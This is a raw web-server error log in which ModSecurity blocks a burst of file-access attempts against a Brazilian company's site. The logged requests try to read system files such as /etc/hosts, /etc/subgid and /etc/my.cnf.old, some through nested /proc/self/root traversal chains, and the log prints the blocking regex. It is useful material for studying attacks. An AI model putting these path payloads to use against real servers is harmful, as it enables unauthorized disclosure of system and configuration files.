[Fri Mar 20 06:17:52.722252 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.36:59796] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QwDJ3M9BSuKP7CAYDjwAAAJc"]
[Fri Mar 20 06:17:54.180602 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.29:59844] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QwuoXxyEfFpUF8f9t4QAAAVg"]
[Fri Mar 20 06:17:54.572136 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.12:59852] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qwta6ubjKNq_cu4a-XwAAA04"]
[Fri Mar 20 06:17:57.210239 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.84:59928] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QxRCii7xarUs8iHZUDQAAAgw"]
[Fri Mar 20 06:17:57.402766 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.34:59932] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QxRCii7xarUs8iHZUDgAAAg0"]
[Fri Mar 20 06:17:59.747624 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.118:59970] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qx_HIg5MgXLBnicPlsQAAAcE"]
[Fri Mar 20 06:17:59.760749 2026] [:error] [pid 11167:tid 140411607643904] [client 57.141.18.26:59996] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qx_HIg5MgXLBnicPlsgAAAdA"]
[Fri Mar 20 06:18:00.662856 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.26:60010] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QyPHIg5MgXLBnicPlswAAAcs"]
[Fri Mar 20 06:18:00.939178 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.40:60020] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QyOoXxyEfFpUF8f9t6QAAAVA"]
[Fri Mar 20 06:18:02.367075 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.106:60028] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QyvHIg5MgXLBnicPltwAAAc0"]
[Fri Mar 20 06:18:02.499173 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.97:60056] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qyrninkcc-iUj5ApKagAAA5Q"]
[Fri Mar 20 06:18:02.628307 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.51:60058] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QyhCii7xarUs8iHZUDwAAAgc"]
[Fri Mar 20 06:18:02.805142 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.3:60062] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qyl1pVZ5mVmJwsFMb7wAAAE0"]
[Fri Mar 20 06:18:03.974988 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:43688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Qy_XLqtnMIWvjpaKGZwAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:05.052518 2026] [:error] [pid 11167:tid 140411624429312] [client 57.141.18.89:60132] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QzfHIg5MgXLBnicPluQAAAc4"]
[Fri Mar 20 06:18:05.367953 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.96:60138] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qzda6ubjKNq_cu4a-ZgAAA0E"]
[Fri Mar 20 06:18:05.405031 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:33662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0QzfHIg5MgXLBnicPlugAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:06.219157 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.44:60164] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QzvqxLDW4GITHUkTRewAAARM"]
[Fri Mar 20 06:18:06.692985 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:33670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0QzuoXxyEfFpUF8f9t8AAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:06.800188 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.64:60174] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qzl1pVZ5mVmJwsFMb8QAAAEI"]
[Fri Mar 20 06:18:08.709128 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:33680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q0Na6ubjKNq_cu4a-ZwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:10.177685 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:60058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q0rninkcc-iUj5ApKcgAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:11.451624 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:60074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q0wF0L0L-SsrnPo5TvAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:12.719193 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:60082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q1PqxLDW4GITHUkTRfAAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:14.025461 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:60086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q1uoXxyEfFpUF8f9t-QAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:15.309189 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:60090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q1wF0L0L-SsrnPo5TxgAAAsM"], referer: 